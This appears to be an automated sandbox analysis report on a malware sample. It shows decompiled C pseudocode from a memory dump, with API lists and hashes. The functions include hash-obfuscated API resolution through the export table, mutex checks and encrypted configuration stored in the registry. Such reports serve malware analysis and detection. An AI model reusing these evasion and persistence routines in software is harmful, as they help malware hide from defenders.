                                    				_v8 = 0x104;
                                    				_t47 = __edx;
                                    				memset( &_v1048, 0, 0x208);
                                    				memset( &_v528, 0, 0x208);
                                    				_t21 =  *0x9e698; // 0x12afbc8
                                    				 *((intOrPtr*)(_t21 + 4))(0, 0x1a, 0, 1,  &_v1048);
                                    				_t49 = E0008B946(_t39);
                                    				_t26 =  *0x9e6b8; // 0x12afbd8
                                    				_t27 =  *_t26(_t49,  &_v528,  &_v8); // executed
                                    				if(_t27 == 0) {
                                    					_t33 =  *0x9e688; // 0xf0000
                                    					if(E0008BB8D( *((intOrPtr*)( *((intOrPtr*)(_t33 + 0x110))))) != 0) {
                                    						_t36 =  *0x9e698; // 0x12afbc8
                                    						 *((intOrPtr*)(_t36 + 4))(0, 0x24, 0, 1,  &_v528);
                                    					}
                                    				}
                                    				_t40 =  *0x9e684; // 0x12af8f0
                                    				 *((intOrPtr*)(_t40 + 0x30))(_t49);
                                    				lstrcpynW(_t47,  &_v1046 + E0008C392( &_v528) * 2, 0x104);
                                    				return 1;
                                    			}

                                    APIs
                                    • memset.MSVCRT ref: 0008B037
                                    • memset.MSVCRT ref: 0008B045
                                    • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000001,?,?,?,?,?,?,00000000), ref: 0008B05F
                                      • Part of subcall function 0008B946: GetCurrentThread.KERNEL32(00000008,00000000,10000000,00000000,?,?,0008BA7C,74EC17D9,10000000), ref: 0008B959
                                      • Part of subcall function 0008B946: GetLastError.KERNEL32(?,?,0008BA7C,74EC17D9,10000000), ref: 0008B967
                                      • Part of subcall function 0008B946: GetCurrentProcess.KERNEL32(00000008,10000000,?,?,0008BA7C,74EC17D9,10000000), ref: 0008B980
                                    • lstrcpynW.KERNEL32(?,?,00000104,?,?,?,?,?,00000000), ref: 0008B0D0
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: Currentmemset$ErrorFolderLastPathProcessThreadlstrcpyn
                                    • String ID:
                                    • API String ID: 3158470084-0
                                    • Opcode ID: 3309cad5030584fc54aa8f49d31479e0ce1f2041df6bd5106adfde4e1a117ce7
                                    • Instruction ID: 19c7f563789c793ddff4382733eb78b8a69f152fd9c3ce08f6bae5569c2b2d08
                                    • Opcode Fuzzy Hash: 3309cad5030584fc54aa8f49d31479e0ce1f2041df6bd5106adfde4e1a117ce7
                                    • Instruction Fuzzy Hash: FA218EB2501218BFE710EBA4DCC9EDB77BCBB49354F1040A5F20AD7192EB749E458B60
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E0008BF37(short* __edx, short* _a4) {
                                    				void* _v8;
                                    				int _v12;
                                    				int _v16;
                                    				char* _v20;
                                    				char* _t30;
                                    				intOrPtr _t31;
                                    				char* _t49;
                                    
                                    				_v16 = 0;
                                    				_v12 = 0;
                                    				_v8 = 0;
                                    				if(RegOpenKeyExW(0x80000002, __edx, 0, 0x20019,  &_v8) == 0) {
                                    					if(RegQueryValueExW(_v8, _a4, 0,  &_v16, 0,  &_v12) != 0) {
                                    						L6:
                                    						if(_v8 != 0) {
                                    							_t31 =  *0x9e68c; // 0x12afab8
                                    							 *((intOrPtr*)(_t31 + 0x1c))(_v8);
                                    						}
                                    						_t30 = 0;
                                    						L9:
                                    						return _t30;
                                    					}
                                    					_t49 = E00088604(_v12);
                                    					_v20 = _t49;
                                    					if(_t49 == 0) {
                                    						goto L6;
                                    					}
                                    					if(RegQueryValueExW(_v8, _a4, 0, 0, _t49,  &_v12) == 0) {
                                    						RegCloseKey(_v8);
                                    						_t30 = _t49;
                                    						goto L9;
                                    					}
                                    					E0008861A( &_v20, 0xfffffffe);
                                    					goto L6;
                                    				}
                                    				return 0;
                                    			}

                                    APIs
                                    • RegOpenKeyExW.KERNEL32(80000002,00000000,00000000,00020019,00000000,00000000,?,?,00082C08,00000000), ref: 0008BF5E
                                    • RegQueryValueExW.KERNEL32(00000000,00082C08,00000000,?,00000000,00082C08,00000000,?,?,00082C08,00000000), ref: 0008BF82
                                    • RegQueryValueExW.KERNEL32(00000000,00082C08,00000000,00000000,00000000,00082C08,?,?,00082C08,00000000), ref: 0008BFB0
                                    • RegCloseKey.KERNEL32(00000000,?,?,00082C08,00000000,?,?,?,?,?,?,?,000000AF,?), ref: 0008BFE5
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: QueryValue$CloseOpen
                                    • String ID:
                                    • API String ID: 1586453840-0
                                    • Opcode ID: 7e5c6c0b12421700877791a8b1243c8e4f1c457698047c2e59d80b208f0cb83c
                                    • Instruction ID: 30ccd786ff8b7b84f14da17d4d39020c4d4bce544ae74224a6a2efcb0f455484
                                    • Opcode Fuzzy Hash: 7e5c6c0b12421700877791a8b1243c8e4f1c457698047c2e59d80b208f0cb83c
                                    • Instruction Fuzzy Hash: 3121E8B6900118FFDB50EBA9DC48E9EBBF8FF88750B1541AAF645E6162D7309A00DB50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E0008BE9B(void* __ecx, char* __edx, char* _a4, intOrPtr* _a12) {
                                    				void* _v8;
                                    				int _v12;
                                    				int _v16;
                                    				intOrPtr* _t43;
                                    				char* _t46;
                                    
                                    				_t46 = 0;
                                    				_v8 = 0;
                                    				_v16 = 0;
                                    				if(RegOpenKeyExA(__ecx, __edx, 0, 0x20019,  &_v8) != 0) {
                                    					return 0;
                                    				}
                                    				_v12 = 0;
                                    				if(RegQueryValueExA(_v8, _a4, 0,  &_v16, 0,  &_v12) == 0) {
                                    					_t46 = E00088604(_v12 + 1);
                                    					if(_t46 != 0 && RegQueryValueExA(_v8, _a4, 0,  &_v16, _t46,  &_v12) == 0) {
                                    						_t43 = _a12;
                                    						if(_t43 != 0) {
                                    							 *_t43 = _v12;
                                    						}
                                    					}
                                    				}
                                    				if(_v8 != 0) {
                                    					RegCloseKey(_v8);
                                    				}
                                    				return _t46;
                                    			}









                                    APIs
                                    • RegOpenKeyExA.KERNEL32(?,00000000,00000000,00020019,?,012AFC08,00000000,?,00000002), ref: 0008BEBE
                                    • RegQueryValueExA.KERNEL32(?,00000002,00000000,?,00000000,00000002,?,00000002), ref: 0008BEE1
                                    • RegQueryValueExA.KERNEL32(?,00000002,00000000,?,00000000,00000002,?,00000002), ref: 0008BF0E
                                    • RegCloseKey.KERNEL32(?,?,00000002), ref: 0008BF2E
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: QueryValue$CloseOpen
                                    • String ID:
                                    • API String ID: 1586453840-0
                                    • Opcode ID: 7a4cdaf7386973441e4760f86288c6c940ee8b5e5eb7e5f1cc676981f8255861
                                    • Instruction ID: a503bc69bf056dc60d578d60e72969ac8cbe77b2aa393cc8f9a4dd6054926014
                                    • Opcode Fuzzy Hash: 7a4cdaf7386973441e4760f86288c6c940ee8b5e5eb7e5f1cc676981f8255861
                                    • Instruction Fuzzy Hash: 0921A4B5A00148BF9B61DFA9DC44DAEBBF8FF98740B1141A9B945E7211D7309E00DB60
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E0008DFAD(void* __ecx, intOrPtr __edx) {
                                    				signed int _v8;
                                    				intOrPtr _v12;
                                    				intOrPtr _v16;
                                    				intOrPtr _v20;
                                    				intOrPtr _v24;
                                    				intOrPtr _v28;
                                    				char _v92;
                                    				intOrPtr _t41;
                                    				signed int _t47;
                                    				signed int _t49;
                                    				signed int _t51;
                                    				void* _t56;
                                    				struct HINSTANCE__* _t58;
                                    				_Unknown_base(*)()* _t59;
                                    				intOrPtr _t60;
                                    				void* _t62;
                                    				intOrPtr _t63;
                                    				void* _t69;
                                    				char _t70;
                                    				void* _t75;
                                    				CHAR* _t80;
                                    				void* _t82;
                                    
                                    				_t75 = __ecx;
                                    				_v12 = __edx;
                                    				_t60 =  *((intOrPtr*)(__ecx + 0x3c));
                                    				_t41 =  *((intOrPtr*)(_t60 + __ecx + 0x78));
                                    				if(_t41 == 0) {
                                    					L4:
                                    					return 0;
                                    				}
                                    				_t62 = _t41 + __ecx;
                                    				_v24 =  *((intOrPtr*)(_t62 + 0x24)) + __ecx;
                                    				_t73 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
                                    				_t63 =  *((intOrPtr*)(_t62 + 0x18));
                                    				_v28 =  *((intOrPtr*)(_t62 + 0x1c)) + __ecx;
                                    				_t47 = 0;
                                    				_v20 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
                                    				_v8 = 0;
                                    				_v16 = _t63;
                                    				if(_t63 == 0) {
                                    					goto L4;
                                    				} else {
                                    					goto L2;
                                    				}
                                    				while(1) {
                                    					L2:
                                    					_t49 = E0008D400( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75, E0008C379( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75), 0);
                                    					_t51 = _v8;
                                    					if((_t49 ^ 0x218fe95b) == _v12) {
                                    						break;
                                    					}
                                    					_t73 = _v20;
                                    					_t47 = _t51 + 1;
                                    					_v8 = _t47;
                                    					if(_t47 < _v16) {
                                    						continue;
                                    					}
                                    					goto L4;
                                    				}
                                    				_t69 =  *((intOrPtr*)(_t60 + _t75 + 0x78)) + _t75;
                                    				_t80 =  *((intOrPtr*)(_v28 + ( *(_v24 + _t51 * 2) & 0x0000ffff) * 4)) + _t75;
                                    				if(_t80 < _t69 || _t80 >=  *((intOrPtr*)(_t60 + _t75 + 0x7c)) + _t69) {
                                    					return _t80;
                                    				} else {
                                    					_t56 = 0;
                                    					while(1) {
                                    						_t70 = _t80[_t56];
                                    						if(_t70 == 0x2e || _t70 == 0) {
                                    							break;
                                    						}
                                    						 *((char*)(_t82 + _t56 - 0x58)) = _t70;
                                    						_t56 = _t56 + 1;
                                    						if(_t56 < 0x40) {
                                    							continue;
                                    						}
                                    						break;
                                    					}
                                    					 *((intOrPtr*)(_t82 + _t56 - 0x58)) = 0x6c6c642e;
                                    					 *((char*)(_t82 + _t56 - 0x54)) = 0;
                                    					if( *((char*)(_t56 + _t80)) != 0) {
                                    						_t80 =  &(( &(_t80[1]))[_t56]);
                                    					}
                                    					_t40 =  &_v92; // 0x6c6c642e
                                    					_t58 = LoadLibraryA(_t40); // executed
                                    					if(_t58 == 0) {
                                    						goto L4;
                                    					}
                                    					_t59 = GetProcAddress(_t58, _t80);
                                    					if(_t59 == 0) {
                                    						goto L4;
                                    					}
                                    					return _t59;
                                    				}
                                    			}


























                                    APIs
                                    • LoadLibraryA.KERNEL32(.dll), ref: 0008E07D
                                    • GetProcAddress.KERNEL32(00000000,8DF08B59), ref: 0008E089
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: .dll
                                    • API String ID: 2574300362-2738580789
                                    • Opcode ID: 6b3667d21c83c631e7308aa9a773b73a335c260cf3743c54930195356ac01f65
                                    • Instruction ID: 961bbec8ee8d513a9e7f355b8d92f0886381f3dfd6057b13809224bdd72c88db
                                    • Opcode Fuzzy Hash: 6b3667d21c83c631e7308aa9a773b73a335c260cf3743c54930195356ac01f65
                                    • Instruction Fuzzy Hash: 6F310631A001458BCB25EFADC884BAEBBF5BF44304F280869D981D7352DB70EC81CB90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 89%
                                    			E00089B43(char __ecx, int __edx, void* __fp0, int* _a4, int* _a8, int* _a12) {
                                    				void* _v8;
                                    				int _v12;
                                    				void* _v16;
                                    				void* _v20;
                                    				int _v24;
                                    				void* _v28;
                                    				char _v32;
                                    				char _v36;
                                    				int* _v40;
                                    				int** _v44;
                                    				void _v108;
                                    				int* _t90;
                                    				void* _t91;
                                    				char* _t92;
                                    				long _t96;
                                    				int* _t97;
                                    				intOrPtr _t98;
                                    				int* _t101;
                                    				long _t111;
                                    				int* _t112;
                                    				intOrPtr _t122;
                                    				char* _t125;
                                    				intOrPtr _t126;
                                    				intOrPtr _t128;
                                    				int* _t129;
                                    				intOrPtr _t131;
                                    				int* _t133;
                                    				intOrPtr _t134;
                                    				int* _t135;
                                    				intOrPtr _t136;
                                    				char* _t139;
                                    				int _t143;
                                    				int _t147;
                                    				intOrPtr _t148;
                                    				int* _t149;
                                    				int* _t154;
                                    				int** _t155;
                                    				int* _t161;
                                    				int* _t163;
                                    				intOrPtr _t164;
                                    				intOrPtr _t171;
                                    				int _t176;
                                    				char* _t177;
                                    				char* _t178;
                                    				char _t179;
                                    				void* _t180;
                                    				void* _t181;
                                    				void* _t183;
                                    
                                    				_t176 = 0;
                                    				_v24 = __edx;
                                    				_t177 = 0;
                                    				_v32 = __ecx;
                                    				_v28 = 0;
                                    				_v8 = 0x80000001;
                                    				_v20 = 0;
                                    				_t155 = E00088604(0x110);
                                    				_v44 = _t155;
                                    				if(_t155 != 0) {
                                    					_t158 = _a4;
                                    					_t155[0x42] = _a4;
                                    					E0008B5F6(_a4, __edx, __eflags, __fp0, _t158,  &_v108);
                                    					_t161 = _v108;
                                    					__eflags = _t161 - 0x61 - 0x19;
                                    					_t90 = _t161;
                                    					if(_t161 - 0x61 <= 0x19) {
                                    						_t90 = _t90 - 0x20;
                                    						__eflags = _t90;
                                    					}
                                    					_v108 = _t90;
                                    					_t91 = E000895C7(0x4d2);
                                    					_t163 = _v24;
                                    					_v16 = _t91;
                                    					__eflags = _t163;
                                    					if(_t163 == 0) {
                                    						L16:
                                    						_t164 =  *0x9e688; // 0xf0000
                                    						__eflags =  *((intOrPtr*)(_t164 + 0x214)) - 3;
                                    						if( *((intOrPtr*)(_t164 + 0x214)) != 3) {
                                    							_push(_t176);
                                    							_push( &_v108);
                                    							_push("\\");
                                    							_t92 = E00089292(_t91);
                                    							_t181 = _t181 + 0x10;
                                    							L20:
                                    							_t177 = _t92;
                                    							_v20 = _t177;
                                    							goto L21;
                                    						}
                                    						_v24 = _t176;
                                    						_v8 = 0x80000003;
                                    						_t122 =  *0x9e68c; // 0x12afab8
                                    						 *((intOrPtr*)(_t122 + 0x20))( *((intOrPtr*)( *((intOrPtr*)(_t164 + 0x110)))),  &_v24);
                                    						__eflags = _v24 - _t177;
                                    						if(_v24 == _t177) {
                                    							goto L21;
                                    						}
                                    						_push(_t176);
                                    						_push( &_v108);
                                    						_t125 = "\\";
                                    						_push(_t125);
                                    						_push(_v16);
                                    						_push(_t125);
                                    						_t92 = E00089292(_v24);
                                    						_t181 = _t181 + 0x18;
                                    						goto L20;
                                    					} else {
                                    						_t126 =  *0x9e688; // 0xf0000
                                    						_t128 =  *0x9e68c; // 0x12afab8
                                    						_t129 =  *((intOrPtr*)(_t128 + 0x68))(_t163,  *((intOrPtr*)( *((intOrPtr*)(_t126 + 0x110)))));
                                    						__eflags = _t129;
                                    						if(_t129 != 0) {
                                    							_t91 = _v16;
                                    							goto L16;
                                    						}
                                    						_v12 = _t176;
                                    						_t131 =  *0x9e68c; // 0x12afab8
                                    						_v8 = 0x80000003;
                                    						 *((intOrPtr*)(_t131 + 0x20))(_v24,  &_v12);
                                    						__eflags = _v12 - _t177;
                                    						if(_v12 == _t177) {
                                    							L21:
                                    							E000885C2( &_v16);
                                    							_t96 = RegOpenKeyExA(_v8, _t177, _t176, 0x20019,  &_v28);
                                    							__eflags = _t96;
                                    							if(_t96 == 0) {
                                    								_t97 = _a8;
                                    								__eflags = _t97;
                                    								if(_t97 != 0) {
                                    									 *_t97 = 1;
                                    								}
                                    								_push(_v28);
                                    								L30:
                                    								_t98 =  *0x9e68c; // 0x12afab8
                                    								 *((intOrPtr*)(_t98 + 0x1c))();
                                    								_t155[0x43] = _v8;
                                    								_t101 = E0008C379(_t177);
                                    								 *_t155 = _t101;
                                    								__eflags = _t101;
                                    								if(_t101 == 0) {
                                    									L32:
                                    									E0008861A( &_v20, 0xffffffff);
                                    									return _t155;
                                    								} else {
                                    									goto L31;
                                    								}
                                    								do {
                                    									L31:
                                    									 *(_t155 + _t176 + 4) =  *(_t180 + (_t176 & 0x00000003) + 8) ^ _t177[_t176];
                                    									_t176 = _t176 + 1;
                                    									__eflags = _t176 -  *_t155;
                                    								} while (_t176 <  *_t155);
                                    								goto L32;
                                    							}
                                    							_v16 = _t176;
                                    							_t111 = RegCreateKeyA(_v8, _t177,  &_v16);
                                    							__eflags = _t111;
                                    							if(_t111 == 0) {
                                    								_t112 = _a8;
                                    								__eflags = _t112;
                                    								if(_t112 != 0) {
                                    									 *_t112 = _t176;
                                    								}
                                    								_push(_v16);
                                    								goto L30;
                                    							}
                                    							L23:
                                    							E0008861A( &_v44, 0x110);
                                    							memset( &_v108, _t176, 0x40);
                                    							E0008861A( &_v20, 0xffffffff);
                                    							goto L1;
                                    						}
                                    						_push(_t176);
                                    						_push(_v16);
                                    						_t178 = "\\";
                                    						_push(_t178);
                                    						_t133 = E00089292(_v12);
                                    						_t181 = _t181 + 0x10;
                                    						_v40 = _t133;
                                    						__eflags = _t133;
                                    						if(_t133 == 0) {
                                    							goto L23;
                                    						}
                                    						_t134 =  *0x9e68c; // 0x12afab8
                                    						_t135 =  *((intOrPtr*)(_t134 + 0x14))(_v8, _t133, _t176, 0x20019,  &_v36);
                                    						__eflags = _t135;
                                    						if(_t135 == 0) {
                                    							_t136 =  *0x9e68c; // 0x12afab8
                                    							 *((intOrPtr*)(_t136 + 0x1c))(_v36);
                                    						} else {
                                    							_t143 = E000895E1( &_v36, 0x34);
                                    							_v24 = _t143;
                                    							_t179 = E000892E5(_v32);
                                    							_v32 = _t179;
                                    							E000885D5( &_v24);
                                    							_t183 = _t181 + 0x18;
                                    							_t147 = E00089256(_v12);
                                    							_v24 = _t147;
                                    							_t148 =  *0x9e68c; // 0x12afab8
                                    							_t149 =  *((intOrPtr*)(_t148 + 0x30))(_v8, _t147, _t179, "\\", _t143, _t176);
                                    							__eflags = _t149;
                                    							if(_t149 == 0) {
                                    								_t154 = _a12;
                                    								__eflags = _t154;
                                    								if(_t154 != 0) {
                                    									 *_t154 = 1;
                                    								}
                                    							}
                                    							E0008861A( &_v32, 0xfffffffe);
                                    							E0008861A( &_v24, 0xfffffffe);
                                    							_t181 = _t183 + 0x10;
                                    							_t178 = "\\";
                                    						}
                                    						_t139 = E00089292(_v12);
                                    						_t171 =  *0x9e684; // 0x12af8f0
                                    						_t181 = _t181 + 0x18;
                                    						_t177 = _t139;
                                    						_v20 = _t177;
                                    						 *((intOrPtr*)(_t171 + 0x34))(_v12, _t178, _v16, _t178,  &_v108, _t176);
                                    						E0008861A( &_v40, 0xffffffff);
                                    						goto L21;
                                    					}
                                    				}
                                    				L1:
                                    				return 0;
                                    			}



















































                                    0x00089c6f
                                    0x00089c72
                                    0x00089c77
                                    0x00089c7a
                                    0x00089c7c
                                    0x00089c7e
                                    0x00089c81
                                    0x00089c83
                                    0x00089c85
                                    0x00089c85
                                    0x00089c83
                                    0x00089c91
                                    0x00089c9c
                                    0x00089ca1
                                    0x00089ca4
                                    0x00089ca4
                                    0x00089cc3
                                    0x00089cc8
                                    0x00089cce
                                    0x00089cd1
                                    0x00089cd3
                                    0x00089cd9
                                    0x00089ce2
                                    0x00000000
                                    0x00089ce8
                                    0x00089bb8
                                    0x00089b77
                                    0x00000000

                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID:
                                    • API String ID: 1279760036-0
                                    • Opcode ID: e334c5ee5511fffd280dad1b434540434d102184dc43e0ee245e387017bf4914
                                    • Instruction ID: 48420b51e388212ba148de9a5a5aa9c152fd141e90dbe33b6e7652c92ab7c875
                                    • Opcode Fuzzy Hash: e334c5ee5511fffd280dad1b434540434d102184dc43e0ee245e387017bf4914
                                    • Instruction Fuzzy Hash: 139127B1900209AFDF10EFA9DD45DEEBBB8FF48310F144169F555AB262DB359A00CB61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 82%
                                    			E0008A0AB(signed int __ecx, char* __edx, void* __fp0, void* _a4, char _a8, char _a12) {
                                    				char* _v12;
                                    				char _v16;
                                    				int _v20;
                                    				signed int _v24;
                                    				intOrPtr _v28;
                                    				char* _v32;
                                    				char _v52;
                                    				char _v64;
                                    				char _v328;
                                    				char _v2832;
                                    				signed int _t48;
                                    				signed int _t49;
                                    				char* _t54;
                                    				long _t73;
                                    				long _t80;
                                    				long _t83;
                                    				void* _t88;
                                    				char* _t89;
                                    				intOrPtr _t90;
                                    				void* _t103;
                                    				void* _t104;
                                    				char* _t106;
                                    				intOrPtr _t107;
                                    				char _t108;
                                    
                                    				_t48 = __ecx;
                                    				_t89 = __edx;
                                    				_v24 = __ecx;
                                    				if(_a4 == 0 || _a8 == 0) {
                                    					L13:
                                    					_t49 = _t48 | 0xffffffff;
                                    					__eflags = _t49;
                                    					return _t49;
                                    				} else {
                                    					_t115 = __edx;
                                    					if(__edx == 0) {
                                    						goto L13;
                                    					}
                                    					_t107 =  *((intOrPtr*)(__ecx + 0x108));
                                    					_push(_t107);
                                    					_t103 = 4;
                                    					_v12 = __edx;
                                    					_v28 = E0008D400( &_v12, _t103);
                                    					_t93 = _t107 + __edx;
                                    					E00092301(_t107 + __edx,  &_v2832);
                                    					_t54 = E0009242D(_t93, _t115, __fp0,  &_v2832, 0, 0x64);
                                    					_t108 = _a8;
                                    					_v12 = _t54;
                                    					_v20 = _t54 + 6 + _t108;
                                    					_t106 = E00088604(_t54 + 6 + _t108);
                                    					_v32 = _t106;
                                    					if(_t106 != 0) {
                                    						 *_t106 = _a12;
                                    						_t16 =  &(_t106[6]); // 0x6
                                    						_t106[1] = 1;
                                    						_t106[2] = _t108;
                                    						E000886E1(_t16, _a4, _t108);
                                    						_t21 = _t108 + 6; // 0x6
                                    						E000922D3( &_v2832, _t21 + _t106, _v12);
                                    						_v16 = _t89;
                                    						_t90 = _v24;
                                    						_v12 =  *((intOrPtr*)(_t90 + 0x108));
                                    						_push( &_v52);
                                    						_t104 = 8;
                                    						E0008F490( &_v16, _t104);
                                    						E0008EAC1( &_v16,  &_v52, 0x14,  &_v328);
                                    						E0008EB2E(_t106, _v20,  &_v328);
                                    						_t73 = E00089B0E(_t90);
                                    						_v12 = _t73;
                                    						__eflags = _t73;
                                    						if(_t73 != 0) {
                                    							E000897A0(_v28,  &_v64, 0x10);
                                    							_t80 = RegOpenKeyExA( *(_t90 + 0x10c), _v12, 0, 2,  &_a4);
                                    							__eflags = _t80;
                                    							if(_t80 == 0) {
                                    								_t83 = RegSetValueExA(_a4,  &_v64, 0, 3, _t106, _v20);
                                    								__eflags = _t83;
                                    								if(_t83 != 0) {
                                    									_push(0xfffffffc);
                                    									_pop(0);
                                    								}
                                    								RegCloseKey(_a4);
                                    							} else {
                                    								_push(0xfffffffd);
                                    								_pop(0);
                                    							}
                                    							E0008861A( &_v12, 0xffffffff);
                                    						}
                                    						E0008861A( &_v32, 0);
                                    						return 0;
                                    					}
                                    					_t88 = 0xfffffffe;
                                    					return _t88;
                                    				}
                                    			}




























                                    APIs
                                      • Part of subcall function 0009242D: _ftol2_sse.MSVCRT ref: 0009248E
                                      • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                                    • RegOpenKeyExA.KERNEL32(?,00000000,00000000,00000002,00000000), ref: 0008A1DE
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeapOpen_ftol2_sse
                                    • String ID:
                                    • API String ID: 3756893521-0
                                    • Opcode ID: ceb7e804541080db6b3cb85923b363ab7d14183699dbb7a162a48657ba5fffad
                                    • Instruction ID: 678beb8ec0cb8c060cb6281312f41271aa2b36fb26bfbf1ebb42210e6552e48b
                                    • Opcode Fuzzy Hash: ceb7e804541080db6b3cb85923b363ab7d14183699dbb7a162a48657ba5fffad
                                    • Instruction Fuzzy Hash: 7551B372A00209BBDF20EF94DC41FDEBBB8BF05320F108166F555A7291EB749644CB50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 86%
                                    			E0008B998(union _TOKEN_INFORMATION_CLASS __edx, DWORD* _a4) {
                                    				long _v8;
                                    				void* _v12;
                                    				void* _t12;
                                    				void* _t20;
                                    				void* _t22;
                                    				union _TOKEN_INFORMATION_CLASS _t28;
                                    				void* _t31;
                                    
                                    				_push(_t22);
                                    				_push(_t22);
                                    				_t31 = 0;
                                    				_t28 = __edx;
                                    				_t20 = _t22;
                                    				if(GetTokenInformation(_t20, __edx, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
                                    					L6:
                                    					_t12 = _t31;
                                    				} else {
                                    					_t31 = E00088604(_v8);
                                    					_v12 = _t31;
                                    					if(_t31 != 0) {
                                    						if(GetTokenInformation(_t20, _t28, _t31, _v8, _a4) != 0) {
                                    							goto L6;
                                    						} else {
                                    							E0008861A( &_v12, _t16);
                                    							goto L3;
                                    						}
                                    					} else {
                                    						L3:
                                    						_t12 = 0;
                                    					}
                                    				}
                                    				return _t12;
                                    			}











                                    APIs
                                    • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,74EC17D9,00000000,10000000,00000000,00000000,?,0008BA37,?,00000000,?,0008D0A8), ref: 0008B9B3
                                    • GetLastError.KERNEL32(?,0008BA37,?,00000000,?,0008D0A8), ref: 0008B9BA
                                      • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                                    • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,?,0008BA37,?,00000000,?,0008D0A8), ref: 0008B9E9
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: InformationToken$AllocateErrorHeapLast
                                    • String ID:
                                    • API String ID: 2499131667-0
                                    • Opcode ID: 650567714d9fdc1599f1fac20ccfc2e022df248ce6cf550bc0370b11c879f389
                                    • Instruction ID: 50b00f07447128573cf446961854993498285b3da02e0cb9ad280b6d8ca9cbf5
                                    • Opcode Fuzzy Hash: 650567714d9fdc1599f1fac20ccfc2e022df248ce6cf550bc0370b11c879f389
                                    • Instruction Fuzzy Hash: 62016272600118BF9B64ABAADC49DAB7FECFF457A17110666F685D3211EB34DD0087A0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E0008590C(CHAR* __ecx, void* __edx, intOrPtr* _a4) {
                                    				intOrPtr _t10;
                                    				void* _t13;
                                    				void* _t19;
                                    				signed int _t21;
                                    				signed int _t22;
                                    
                                    				_t13 = __edx;
                                    				if(__ecx != 0) {
                                    					_t22 = 0;
                                    					_t19 = CreateMutexA(0, 1, __ecx);
                                    					if(_t19 != 0) {
                                    						if(GetLastError() != 0xb7 || E0008A4BF(_t19, _t13) != 0xffffffff) {
                                    							_t22 = 1;
                                    							 *_a4 = _t19;
                                    						} else {
                                    							_t10 =  *0x9e684; // 0x12af8f0
                                    							 *((intOrPtr*)(_t10 + 0x30))(_t19);
                                    						}
                                    					} else {
                                    						GetLastError();
                                    						_t22 = 0xffffffff;
                                    					}
                                    				} else {
                                    					_t22 = _t21 | 0xffffffff;
                                    				}
                                    				return _t22;
                                    			}









                                    APIs
                                    • CreateMutexA.KERNELBASE(00000000,00000001,00000000,00000000,00000000,?,?,000859CD,00085DD4,Global,0009BA18,?,00000000,?,00000002), ref: 00085928
                                    • GetLastError.KERNEL32(?,?,000859CD,00085DD4,Global,0009BA18,?,00000000,?,00000002), ref: 00085934
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: CreateErrorLastMutex
                                    • String ID:
                                    • API String ID: 1925916568-0
                                    • Opcode ID: 1e9ba27d02d2df59a864ede134e86214b79921280e0dcb6860e8fc376ac35514
                                    • Instruction ID: 1c4491eb415752db81424c57f385e659120548c2048b1677d1101b25907139c6
                                    • Opcode Fuzzy Hash: 1e9ba27d02d2df59a864ede134e86214b79921280e0dcb6860e8fc376ac35514
                                    • Instruction Fuzzy Hash: 3FF02831600910CBEA20276ADC4497E76D8FBE6772B510322F9E9D72D0DF748C0543A1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E0008A471(CHAR* __ecx, void* __edx) {
                                    				intOrPtr _t8;
                                    				void* _t16;
                                    				void* _t17;
                                    
                                    				_t16 = __edx; // executed
                                    				_t17 = CreateMutexA(0, 1, __ecx);
                                    				if(_t17 != 0) {
                                    					if(GetLastError() == 0xb7 && E0008A4BF(_t17, _t16) < 0) {
                                    						_t8 =  *0x9e684; // 0x12af8f0
                                    						 *((intOrPtr*)(_t8 + 0x30))(_t17);
                                    						_t17 = 0;
                                    					}
                                    					return _t17;
                                    				}
                                    				GetLastError();
                                    				return 0;
                                    			}







                                    APIs
                                    • CreateMutexA.KERNELBASE(00000000,00000001,?,00000000,00000000,00084E14,00000000), ref: 0008A47F
